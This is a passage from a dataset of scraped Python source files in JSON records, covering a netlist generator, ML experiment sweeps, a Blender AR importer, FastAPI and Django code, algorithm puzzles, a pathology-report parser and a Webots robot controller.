self.process_blocklike(context.path, link)\n\n @staticmethod\n def name_net(net: Iterable[TransformUtil.Path], net_prefix: str) -> str:\n \"\"\"Names a net based on all the paths of ports and links that are part of the net.\"\"\"\n def pin_name_goodness(pin1: TransformUtil.Path, pin2: TransformUtil.Path) -> int:\n assert not pin1.params and not pin2.params\n # TODO rewrite rules to based on _anon internal depth, though elt[0] is likely where the _anon will be\n # First disprefer anon or auto-generated names\n if pin1.links and (pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (not pin2.links or pin2.links[0].startswith('anon') or pin2.links[0].startswith('_')):\n return 1\n elif (not pin1.links or pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (pin2.links and (pin2.links[0].startswith('anon') or pin2.links[0].startswith('_'))):\n return -1\n elif len(pin1.blocks) != len(pin2.blocks): # prefer shorter block paths\n return len(pin1.blocks) - len(pin2.blocks)\n elif len(pin1.ports) == 1 and pin1.ports[0].isnumeric() and \\\n (len(pin2.ports) != 1 or (pin2.ports and not pin2.ports[-1].isnumeric())): # disprefer number-only ports\n return 1\n elif len(pin2.ports) == 1 and pin2.ports[0].isnumeric() and \\\n (len(pin1.ports) != 1 or (pin1.ports and not pin1.ports[-1].isnumeric())): # disprefer number-only ports\n return -1\n elif len(pin1.ports) != len(pin2.ports): # prefer shorter port lengths\n return len(pin1.ports) - len(pin2.ports)\n elif pin1.ports and not pin2.ports: # prefer ports\n return -1\n elif not pin1.ports and pin2.ports:\n return 1\n elif pin1.links and not pin2.links: # prefer links\n return -1\n elif not pin1.links and pin2.links:\n return 1\n else: # prefer shorter pin paths\n return len(pin1.ports) - len(pin2.ports)\n best_path = sorted(net, key=cmp_to_key(pin_name_goodness))[0]\n\n return net_prefix + str(best_path)\n\n def run(self) -> Netlist:\n self.transform_design(self.design.design)\n\n # Sanity check to ensure all pins exist\n for pin_src, pins_dst in self.edges.items():\n assert pin_src in self.pins, f\"missing net edge src pin {pin_src}\"\n for pin_dst in pins_dst:\n assert pin_dst in self.pins, f\"missing net edge dst pin {pin_dst}\"\n\n # Convert to the netlist format\n seen: Set[TransformUtil.Path] = set()\n nets: List[List[TransformUtil.Path]] = [] # use lists instead of sets to preserve ordering\n\n for port, conns in self.edges.items():\n if port not in seen:\n 
curr_net: List[TransformUtil.Path] = []\n frontier: List[TransformUtil.Path] = [port] # use BFS to maintain ordering instead of simpler DFS\n while frontier:\n pin = frontier.pop(0)\n if pin not in seen:\n seen.add(pin)\n curr_net.append(pin)\n frontier.extend(self.edges[pin])\n nets.append(curr_net)\n\n pin_to_net: Dict[TransformUtil.Path, List[TransformUtil.Path]] = {} # values share reference to nets\n for net in nets:\n for pin in net:\n pin_to_net[pin] = net\n\n for (connected1, connected2) in self.assert_connected:\n if pin_to_net[connected1] is not pin_to_net[connected2]:\n raise InvalidPackingException(f\"packed pins {connected1}, {connected2} not connected\")\n\n def name_pin(pin: TransformUtil.Path) -> TransformUtil.Path:\n if pin in self.short_paths:\n return self.short_paths[pin]\n else:\n return pin\n\n board_refdes_prefix = self.design.get_value(('refdes_prefix',))\n if board_refdes_prefix is not None:\n assert isinstance(board_refdes_prefix, str)\n net_prefix = board_refdes_prefix\n else:\n net_prefix = ''\n named_nets = {self.name_net([name_pin(pin) for pin in net], net_prefix): net\n for net in nets}\n\n netlist_blocks = {str(self.names[block_path]): block\n for block_path, block in self.blocks.items()}\n netlist_nets = {name: [self.path_to_pin(self.names[pin])\n for pin in net if pin in self.names]\n for name, net in named_nets.items()}\n\n return Netlist(netlist_blocks, netlist_nets)\n","repo_name":"BerkeleyHCI/PolymorphicBlocks","sub_path":"electronics_model/NetlistGenerator.py","file_name":"NetlistGenerator.py","file_ext":"py","file_size_in_byte":16765,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"35"}
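The run() method above collapses the bidirectional edge map into nets with a breadth-first walk. A self-contained sketch of just that grouping step (names are mine, not the library's; a deque replaces list.pop(0) for O(1) pops while keeping the same visit order):

from collections import deque
from typing import Dict, Hashable, List

def group_into_nets(edges: Dict[Hashable, List[Hashable]]) -> List[List[Hashable]]:
    # BFS over an undirected edge map; each connected component becomes one net,
    # preserving insertion order as in NetlistTransform.run()
    seen = set()
    nets = []
    for start in edges:
        if start in seen:
            continue
        net, frontier = [], deque([start])
        while frontier:
            pin = frontier.popleft()
            if pin in seen:
                continue
            seen.add(pin)
            net.append(pin)
            frontier.extend(edges.get(pin, []))
        nets.append(net)
    return nets

# group_into_nets({"a": ["b"], "b": ["a", "c"], "c": ["b"], "d": []})
# -> [["a", "b", "c"], ["d"]]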
+{"seq_id":"37755447265","text":"import tensorflow as tf\nimport subprocess\nimport sys\nimport itertools\nimport json\nimport random\n\n# Parameters for loss types\nmean_over_batch = {\"True\", \"False\"}\nlinearity = {\"True\", \"False\"}\nloss_type = {\"dist\", \"ratio\"}\nloss_form = {\"log\", \"minus\", \"inverse\" }\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n\n# Params for Architecture\nlosses= [['True', 'ratio', 'minus'], ['False', 'dist', 'log'], ['True', 'dist', 'log'], ['False', 'ratio', 'minus']]\nnumber_of_layers = [3, 4]\nkernel_size = [7, 5, 3]\nchannels = [1, 2, 3]\n\n#Try later\n#dilation = [1,2]\n#dropout = [0.8,1]\n\n\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\", \"kernel_shape\", \"dialation_rate\"]\n\n#archs_perm = [losses, number_of_layers, kernel_type, channels]\n\n\ndef main(unusedargs):\n linearity_experiment()\n\n\ndef loss_experiment():\n print('Running..')\n loss_perm = [mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"loss=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n\ndef linearity_experiment():\n print('running')\n loss_perm = [linearity, mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n argnames= [\"linear\", \"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"lin=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n print(param[0])\n\n\n kernel = construct_kernel(random.choice(number_of_layers))\n if param[0]=='True':\n kernel = [[32,32,1,1]]\n\n script.append(\"--kernel_shape=\"+json.dumps(kernel).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n# Experiment for architectures\ndef architecture_experiment():\n kernel_shapes = []\n for i in range (40):\n kernel_shapes.append(construct_kernel(random.choice(number_of_layers)))\n\n archs_perm = [losses, kernel_shapes]\n params = list(itertools.product(*archs_perm))\n argnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n #print(len(params))\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"arch_l\" + str(len(param[1]))+\"=[\"\n for row in param[1]:\n name += str(row[0])+\",\"+str(row[3])+\"-\"\n name +=\"]\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[0][i])\n name += '_'+param[0][i]\n i = i + 1\n\n script.append(\"--kernel_shape=\"+json.dumps(param[1]).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=400\")\n script = ' '.join(script)\n #print(name)\n subprocess.call(script, shell=True)\n\n\n\ndef construct_kernel(num_layer):\n\n def calc_channel(k_size, coef):\n return 25*coef/(k_size)\n\n k_size = random.choice(kernel_size)\n if num_layer == 1:\n return [[k_size, k_size, 1, 1]]\n\n k_last_size = random.choice(kernel_size)\n coef = random.choice(channels)\n channel = calc_channel(k_last_size, coef)\n kernel_shape = [[k_size, k_size, 1, channel]]\n\n if num_layer == 2:\n new_layer = [k_last_size, k_last_size, channel, 1]\n 
kernel_shape.append(new_layer)\n return kernel_shape\n\n if num_layer>2:\n for i in range(num_layer-2):\n old_channel = channel\n coef = random.choice(channels)\n k_size = random.choice(kernel_size)\n channel = calc_channel(k_size, coef)\n\n new_layer = [k_size, k_size, old_channel, channel]\n kernel_shape.append(new_layer)\n\n new_layer = [k_last_size, k_last_size, channel, 1]\n kernel_shape.append(new_layer)\n return kernel_shape\n\n\nif __name__ == '__main__':\n tf.app.run(main=main, argv=[sys.argv[0]])\n","repo_name":"seung-lab/FilterFinder","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
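All three experiment functions above follow one pattern: a cartesian product of parameter sets turned into train.py invocations. A generic sketch of that pattern (names are mine); pairing names and values with zip also sidesteps the index mismatch that loss_experiment would hit if invoked, since the module-level argnames list has five entries while its parameter tuples have three:

import itertools
import subprocess

def run_sweep(param_grid, argnames, steps=1000):
    # one train.py call per point in the cartesian product of the grid
    for values in itertools.product(*param_grid):
        args = [f"--{name}={value}" for name, value in zip(argnames, values)]
        cmd = " ".join(["python train.py", *args, f"--steps={steps}"])
        print(cmd)
        subprocess.call(cmd, shell=True)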
+{"seq_id":"22844441013","text":"\nimport bpy\nfrom bpy.props import *\nfrom bpy.types import Menu, Operator, Panel, UIList, AddonPreferences\nfrom bpy.app.handlers import persistent\nimport os\nfrom os.path import basename, dirname, join\nimport shutil\nimport requests\n\nclass ARImporterAddonPreferences(AddonPreferences):\n\n bl_idname = basename(dirname(__file__)) # directory name containing this file\n\n ip_address = StringProperty(\n name=\"IP Address\",\n )\n\n ar_root = StringProperty(\n name=\"Storage root\",\n subtype='FILE_PATH',\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"ip_address\")\n layout.prop(self, \"ar_root\")\n\n# -------------------------------------------------------------------------------\n# UI PANEL - Extra Image List\n# -------------------------------------------------------------------------------\nclass ARImporter_PT_ImagePreview(Panel):\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_category = \"AR Importer\"\n bl_label = \"Import\"\n\n def draw(self, context):\n layout = self.layout\n row = layout.row()\n row.operator(\"arimporter.latest\", text=\"Import Latest\")\n\n\nclass ARImportLatest(Operator):\n bl_idname = \"arimporter.latest\"\n bl_label = \"Latest\"\n bl_description = \"AR Import Latest\"\n\n def execute(self, context):\n user_preferences = context.user_preferences\n addon_prefs = user_preferences.addons[basename(dirname(__file__))].preferences\n root_url = \"http://%s/\" % addon_prefs.ip_address\n\n print(\"Importing latest \" + addon_prefs.ip_address)\n resp = requests.get(root_url + \"shots\").json()\n latest = resp[0]\n print(latest)\n local_shot_dir = join(addon_prefs.ar_root, latest[\"uuid\"])\n\n file_types = [\"_pointcloud_z.ply\", \".mov\", \"_scene.fbx\"]\n try:\n # Create target Directory\n os.mkdir(local_shot_dir)\n except FileExistsError:\n print(\"Directory \", local_shot_dir, \" already exists\")\n\n local_files = []\n for file_type in file_types:\n remote_url = root_url + \"content/shots/%s/shot-%s%s\" % (latest[\"uuid\"], latest[\"uuid\"], file_type)\n file_basename = basename(remote_url)\n local_file = join(local_shot_dir, file_basename)\n local_files.append(local_file)\n r = requests.get(remote_url, allow_redirects=True)\n open(local_file, 'wb').write(r.content)\n\n for local_file in local_files:\n if local_file.endswith(\".fbx\"):\n bpy.ops.import_scene.fbx(filepath=local_file, anim_offset=0, bake_space_transform=True)\n if local_file.endswith(\".ply\"):\n bpy.ops.import_mesh.ply(filepath=local_file)\n if local_file.endswith(\".mov\"):\n clip = bpy.data.movieclips.load(local_file)\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n space_data = area.spaces.active\n space_data.show_background_images = True\n bg = space_data.background_images.new()\n bg.clip = clip\n bg.source = 'MOVIE_CLIP'\n bg.use_camera_clip = False\n bg.opacity = 1\n break\n\n return {'FINISHED'}\n\n\n","repo_name":"FreakTheMighty/BlenderARImporter","sub_path":"ar_importer_utils.py","file_name":"ar_importer_utils.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"13727799760","text":"\"\"\"GET endpoints for users.\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom db.database import get_db\nimport schemas\nfrom db import crud\n\nrouter = APIRouter(prefix=\"/users\", tags=[\"user\"])\n\n\n@router.get(\"/\", response_model=list[schemas.UserInfo])\nasync def read_users_id(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n \"\"\"Read all users ids.\"\"\"\n items = crud.get_all_users(db, skip=skip, limit=limit)\n if len(items) == 0:\n raise HTTPException(status_code=404, detail=\"Users not found\")\n return items\n\n\n@router.get(\n \"/{telegram_id}\", response_model=schemas.UserEdit, status_code=status.HTTP_200_OK\n)\nasync def read_user(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Read user by telegram id without list of sent articles.\"\"\"\n db_user = crud.get_user(db, user_telegram_id=telegram_id)\n if db_user is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND, detail=\"User not found\"\n )\n return db_user\n\n\n@router.get(\"/{telegram_id}/articles\", response_model=schemas.UserArticlesSentView)\nasync def read_user_with_sent_articles(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Get user info with a list of sent articles matching language code and user_telegram_id.\"\"\"\n db_articles = crud.get_user(db, user_telegram_id=telegram_id)\n if db_articles is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return db_articles\n","repo_name":"VetalM84/fastApiKafkaBot","sub_path":"routers/users_get.py","file_name":"users_get.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"29888259932","text":"import numpy as np\r\nimport math\r\nimport pandas as pd\r\n\r\ndf=pd.read_csv(\"A2Q2Data_train.csv\", sep=',',header=None)#The dataset is imported\r\n#please change the location of the file to that in the local computer\r\ndataset = df.to_numpy()\r\n\r\ny=dataset[:,100]\r\nX=dataset[:,0:100]\r\n\r\n\r\nX=np.transpose(X) #here the data points are in rows, this statement converts them to column notation\r\ny=np.transpose(y)\r\nw_ml=np.matmul(np.matmul((np.linalg.pinv(np.matmul(X,np.transpose(X)))),X),y)#The analytical solution for w_ml is directly used\r\nprint(w_ml)\r\n\r\n\r\n","repo_name":"Keshkrish/Machine-Learning-Algorithms","sub_path":"Linear_regression_analytically.py","file_name":"Linear_regression_analytically.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"16828075786","text":"from django.forms import ModelForm\nfrom .models import Entry\nfrom preferences import preferences\nfrom django.utils import timezone\nfrom django import forms\n\nclass EntryForm(ModelForm):\n class Meta:\n model = Entry\n fields = ['entry_date', 'destination', 'notes', 'odo_start', 'odo_end']\n widgets = {\n 'entry_date': forms.DateTimeInput(attrs={'placeholder': 'M/D/YYYY'}, format=\"%m/%d/%y\"),\n }\n \n def save(self, request, commit=True):\n obj = super().save(commit=False)\n obj.user = request.user\n obj.pub_date = timezone.now().date()\n obj.pay_period_start = obj.get_start_of_pay_period_date()\n obj.pay_period_end = obj.get_end_of_pay_period_date()\n \n if 'save' in request.POST:\n obj.draft = False\n elif 'save_as_draft' in request.POST:\n obj.draft = True\n\n if commit:\n obj.save()\n else:\n return obj\n ","repo_name":"jacksonfoster4/mileage_tfw","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"6963442278","text":"class Solution:\n\n # important question review\n # how to explore new properties to reduce time complexity\n # method in math without dp\n # need further optimizing\n def superEggDrop(self, K: int, N: int) -> int:\n f = lambda x, a, b: x if a <= b else x + 1\n ans = [[0 for _ in range(K+1)] for _ in range(N+1)]\n for n in range(1, N+1):\n ans[n][1] = n\n for k in range(2, K+1):\n ans[1][k] = 1\n ans[min(2, N)][k] = min(2, N)\n ans[min(3, N)][k] = min(2, N)\n for k in range(2, K+1):\n x = 1\n for n in range(4, N+1):\n x = f(x, max(ans[x-1][k-1], ans[n-x][k]), max(ans[x][k-1], ans[n-x-1][k]))\n ans[n][k] = max(ans[x-1][k-1], ans[n-x][k] + 1)\n return ans[-1][-1]\n\n\nsol = Solution()\nprint(sol.superEggDrop(3, 1000))\n","repo_name":"ParkerMa1879/leetCode","sub_path":"Hard/Q887/SuperEggDrop.py","file_name":"SuperEggDrop.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"34776032974","text":"# 백준 2294\n# 골드 5 / 동전 2\nimport sys\n\nn, k = map(int,sys.stdin.readline().split())\n\ndp = [float('inf') for _ in range(k+1)]\ncoin_set = set([])\nfor _ in range(n) :\n coin = int(sys.stdin.readline().strip())\n if coin > k :\n continue\n coin_set.add(coin)\n # 초기값 설정\n dp[coin] = 1\n\nfor i in range(1, k+1) :\n for item in coin_set :\n if i - item >= 1 :\n dp[i] = min(dp[i], dp[i-item] + 1)\n\nif dp[k] == float('inf') :\n print(-1)\nelse :\n print(dp[k])","repo_name":"leeyej-i/algorithm","sub_path":"DP/2294.py","file_name":"2294.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"43124762703","text":"from main.helpers import update_monument, format_monument, search_commons_url, search_commons_wlm\nfrom main.wiki_api import execute_query\nfrom django.core.management.base import BaseCommand, CommandError\nfrom main.models import Monument, CategorySnapshot\n\n\nclass Command(BaseCommand):\n help = 'Takes new snapshot'\n\n def add_arguments(self, parser):\n parser.add_argument('id', type=int)\n\n def handle(self, *args, **options):\n\n m = Monument.objects.get(pk=options['id'])\n print(m.relevant_images)\n\n for relevant_image_url in m.relevant_images:\n relevant_images_data = search_commons_url(relevant_image_url)\n print(relevant_images_data)\n\n if m.wlm_n:\n wlm_images_data = search_commons_wlm(m.wlm_n)\n print(len(wlm_images_data))\n\n \n","repo_name":"densitydesign/wlm-backend","sub_path":"server/wlm/main/management/commands/update_monument_pictures.py","file_name":"update_monument_pictures.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"74433260580","text":"import pandas as pd\nfrom pandas import DataFrame\nfrom base_etl import BaseETL\nfrom nltk.tokenize import LineTokenizer\nfrom functools import reduce\nline_tokenizer = LineTokenizer()\n\nclass GeneticStep02(BaseETL):\n\n def run(\n self,\n ):\n sql = \"SELECT * FROM gc_protocol.genetic_step_01 WHERE nullif(병리진단,'') is not null;\"\n df = self.df_from_sql(db_name=\"gc_protocol\", sql=sql)\n\n data = df.set_index(\"원무접수ID\")\n \n\n data_li = data.values.tolist()\n index_li = data.index.tolist()\n x = len(data_li)\n\n print(x)\n\n for j in range(1,15):\n exec(f\"A{j} = list(0 for i in range(0,x))\")\n \n\n for i in range(0,x):\n string = ''.join(data_li[i])\n list_void = line_tokenizer.tokenize(string)\n for j in range(1,15):\n exec(f\"A{j}[i] = []\")\n exec(f\"A{j}[i].append(index_li[i])\")\n for word in list_void:\n word_low = word.lower()\n if 'c-erb-b2' in word_low:\n eval(\"A1[i].append(word)\")\n if 'e-cadherin' in word_low:\n eval('A2[i].append(word)')\n if 'p53' in word_low:\n eval('A3[i].append(word)')\n if 'ki 67' in word_low:\n eval('A4[i].append(word)')\n if 'ki-67' in word_low:\n eval('A4[i].append(word)')\n if 'cd31 and d2-40' in word_low:\n eval('A5[i].append(word)')\n if 'c-kit' in word_low:\n eval('A6[i].append(word)')\n if 'cd34' in word_low:\n eval('A7[i].append(word)')\n if 'pkc-theta' in word_low:\n eval('A8[i].append(word)')\n if 's-100 protein' in word_low:\n eval('A9[i].append(word)')\n if 'a-sma' in word_low:\n eval('A10[i].append(word)')\n if 'smooth muscle actin' in word_low:\n eval('A10[i].append(word)')\n if 'ck' in word_low:\n eval('A11[i].append(word)')\n if 'chromogranin' in word_low:\n eval('A12[i].append(word)')\n if 'ebv' in word_low:\n eval('A13[i].append(word)')\n if 'giemsa' in word_low:\n eval('A14[i].append(word)')\n \n for j in range(1,15):\n exec(f\"dataA{j}=DataFrame(A{j})\")\n \n\n print(eval(\"dataA1\"))\n print(eval(\"dataA2\"))\n print(eval(\"dataA3\"))\n print(eval(\"dataA4\"))\n print(eval(\"dataA5\"))\n print(eval(\"dataA6\"))\n print(eval(\"dataA7\"))\n print(eval(\"dataA8\"))\n print(eval(\"dataA9\"))\n print(eval(\"dataA10\"))\n print(eval(\"dataA11\"))\n print(eval(\"dataA12\"))\n print(eval(\"dataA13\"))\n print(eval(\"dataA14\"))\n eval(\"dataA1.rename(columns={0:'원무접수ID',1:'HER2',2:'HER2_2'},inplace=True)\")\n eval(\"dataA2.rename(columns={0:'원무접수ID',1:'E_Cadherin',2:'E_Cadherin_2',3:'E_Cadherin_3', 4:'E_Cadherin_4'},inplace=True)\")\n eval(\"dataA3.rename(columns={0:'원무접수ID',1:'p53',2:'p53_2'},inplace=True)\")\n eval(\"dataA4.rename(columns={0:'원무접수ID',1:'Ki_67',2:'Ki_67_2',3:'Ki_67_3'},inplace=True)\")\n eval(\"dataA5.rename(columns={0:'원무접수ID',1:'CD31_N_D2_40'},inplace=True)\")\n eval(\"dataA6.rename(columns={0:'원무접수ID',1:'C_kit',2:'C_kit_2'},inplace=True)\")\n eval(\"dataA7.rename(columns={0:'원무접수ID',1:'CD34',2:'CD34_2'},inplace=True)\")\n eval(\"dataA8.rename(columns={0:'원무접수ID',1:'PKC_theta',2:'PKC_theta_2'},inplace=True)\")\n eval(\"dataA9.rename(columns={0:'원무접수ID',1:'s_100',2:'s_100_2',3:'s_100_3'},inplace=True)\")\n eval(\"dataA10.rename(columns={0:'원무접수ID',1:'SMA',2:'SMA_2'},inplace=True)\")\n eval(\"dataA11.rename(columns={0:'원무접수ID',1:'CK',2:'CK_2',3:'CK_3'},inplace=True)\")\n eval(\"dataA12.rename(columns={0:'원무접수ID',1:'Chromogranin',2:'Chromogranin_2'},inplace=True)\")\n eval(\"dataA13.rename(columns={0:'원무접수ID',1:'EBV',2:'EBV_2',3:'EBV_3'},inplace=True)\")\n eval(\"dataA14.rename(columns={0:'원무접수ID',1:'Giemsa',2:'Giemsa_2'},inplace=True)\")\n\n dfs=[eval(\"dataA1\"), eval(\"dataA2\"), 
eval(\"dataA3\"), eval(\"dataA4\"), eval(\"dataA5\"), eval(\"dataA6\"), eval(\"dataA7\"), eval(\"dataA8\"), eval(\"dataA9\"), eval(\"dataA10\"), \n eval(\"dataA11\"), eval(\"dataA12\"), eval(\"dataA13\"), eval(\"dataA14\")]\n data = reduce(lambda left, right: pd.merge(left, right, on='원무접수ID'), dfs)\n data1 = data.drop_duplicates()\n \n print(data1)\n data1.to_excel('C:/Users/Hyunjeong Ki/Gastric_Cancer_xlsx/genetic_step_02.xlsx')\n self.insert(data1, db_name=\"gc_protocol\", tb_name=\"genetic_step_02\")\n\n\nif __name__ == \"__main__\":\n obj = GeneticStep02()\n obj.run()","repo_name":"CNUHGILAB/Gastric_Cancer","sub_path":"Pathology_OD/Genetic_Step_02 copy.py","file_name":"Genetic_Step_02 copy.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35461253946","text":"from .base import FunctionalTest\n\nfrom unittest import skip\n#\n\nclass ItemValiddationaTets(FunctionalTest):\n\n def test_cannot_add_empty_lists_items(self):\n # 伊迪丝访问首页,不小心提交了一个空待办事项\n # 输入框中没输入内容,她就按下了回车键\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('\\n')\n # 首页刷新了,显示一个错误消息\n # 提示待办事项不能为空\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n # 她输入一些文字,然后再次提交,这次没问题了\n self.get_item_input_box().send_keys('Buy milk\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n # 她有点儿调皮,又提交了一个空待办事项\n self.get_item_input_box().send_keys('\\n')\n # 在清单页面她看到了一个类似的错误消息\n self.check_for_row_in_list_table('1:Buy milk')\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n # 输入文字之后就没问题了\n self.get_item_input_box().send_keys('Buy tea\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n self.check_for_row_in_list_table('2:Buy tea')\n self.fail('write me')\n @skip\n def test_cannot_add_duplicate_item(self):\n # 伊迪丝访问首页,新建一个清单\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.check_for_row_in_list_table('1:Buy wellies')\n # 她不小心输入了一个重复的待办事项\n self.get_item_input_box().send_keys('Buy wellies\\n')\n # 她看到一条有帮助的错误消息\n self.check_for_row_in_list_table('1:Buy wellies')\n #error = self.browser.find_element_by_css_selector('.has-error')\n #self.assertEqual(error.text, \"You've already got this in your list\")\n self.wait_for(lambda: self.assertEqual(\n self.get_error_elemeent(),\n \"text You've already got this in your list\"\n ))\n\n def test_error_messages_are_cleared_on_input(self):\n #伊迪丝新建一个清单,但方法不当,所以出现了一个验证错误。\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.get_item_input_box().send_keys('Buy wellies\\n')\n error = self.get_error_elemeent()\n self.assertTrue(error.is_displayed())\n\n #为了消除错误,她开始在输入框中输入内容\n self.get_item_input_box().send_keys('a')\n #看到错误消息消失了,她很高兴\n error = self.get_error_elemeent()\n self.assertFalse(error.is_displayed())\n\n\n def get_error_elemeent(self):\n return self.browser.find_element_by_css_selector('.has-error')","repo_name":"sundhhy/TDD_Superlist","sub_path":"functional_tests/test_list_item_validation.py","file_name":"test_list_item_validation.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28693047084","text":"\"\"\"lab1_task2 controller.\"\"\"\n\n# FIGURE OUT WHATS WRONG WITH ANGLE AND WRITE READINGS TO FILE FOR PLOT AND DO ERROR MESSAGE\n\nfrom controller import Robot\nimport math\n\n# create the Robot instance.\nrobot = Robot()\n\n# get the time step of the current world.\ntimestep = int(robot.getBasicTimeStep())\n\n# X degrees (0 - 360) [Modify]\nX = 20\n# Y seconds [Modify]\nY = 1 \n\ndegreeDiff = 360 - X\n\n# getting the motors and setting position and velocity\nleftMotor = robot.getDevice('left wheel motor')\nrightMotor = robot.getDevice('right wheel motor')\nleftMotor.setPosition(float('inf'))\nrightMotor.setPosition(float('inf'))\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n\n# getting the position sensors\nleftposition_sensor = robot.getDevice('left wheel sensor')\nrightposition_sensor = robot.getDevice('right wheel sensor')\nleftposition_sensor.enable(timestep)\nrightposition_sensor.enable(timestep)\n\nimu = robot.getDevice('inertial unit')\nimu.enable(timestep)\nrobot.step(timestep)\n\n# function to convert from degrees to radians\ndef degreesToRadians(deg):\n return (deg * math.pi / 180) \n \n# function to convert from radians to degrees\ndef radiansToDegrees(rad):\n return ((rad + math.pi) * 180) / math.pi\n \ndistBetweenWheels = 2.28 \ndmid = distBetweenWheels / 2\nwheelRad = 0.8\nwheelCircum = 2 * wheelRad * math.pi\n\nXrad = degreesToRadians(X)\n\ndistanceLeft = Xrad * -dmid\ndistanceRight = Xrad * dmid\n\nvelocityLeft = distanceLeft / Y\nvelocityRight = distanceRight / Y\n\nphiLeft = velocityLeft / wheelRad\nphiRight = velocityRight / wheelRad\n\nangularVelocity = Xrad / Y\n\nprint(phiLeft)\nprint(phiRight)\n\nif (phiRight > 6.28):\n print (\"Error: Velocity exceeds 6.28\")\n exit()\n\ntime_start = robot.getTime()\n\nfile = open(\"lab1_task2_measurements.txt\", \"w\")\nfile.write(\"Angle:\\tTime:\\n\")\n\nleftMotor.setVelocity(phiLeft)\nrightMotor.setVelocity(phiRight)\n\n# main loop\nwhile robot.step(timestep) != -1 and (robot.getTime() - time_start < Y):\n\n leftMotor.setVelocity(phiLeft)\n rightMotor.setVelocity(phiRight)\n\n print(\"time: \" + str(robot.getTime() - time_start))\n print(\"degrees: \" + str(radiansToDegrees(imu.getRollPitchYaw()[2])))\n file.write(str(radiansToDegrees(imu.getRollPitchYaw()[2])) + \"\\t\" + str(robot.getTime() - time_start)+ \"\\n\")\n\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n","repo_name":"bilaljoud/MobileRobotsLabs","sub_path":"Lab1/lab1_task2.py","file_name":"lab1_task2.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
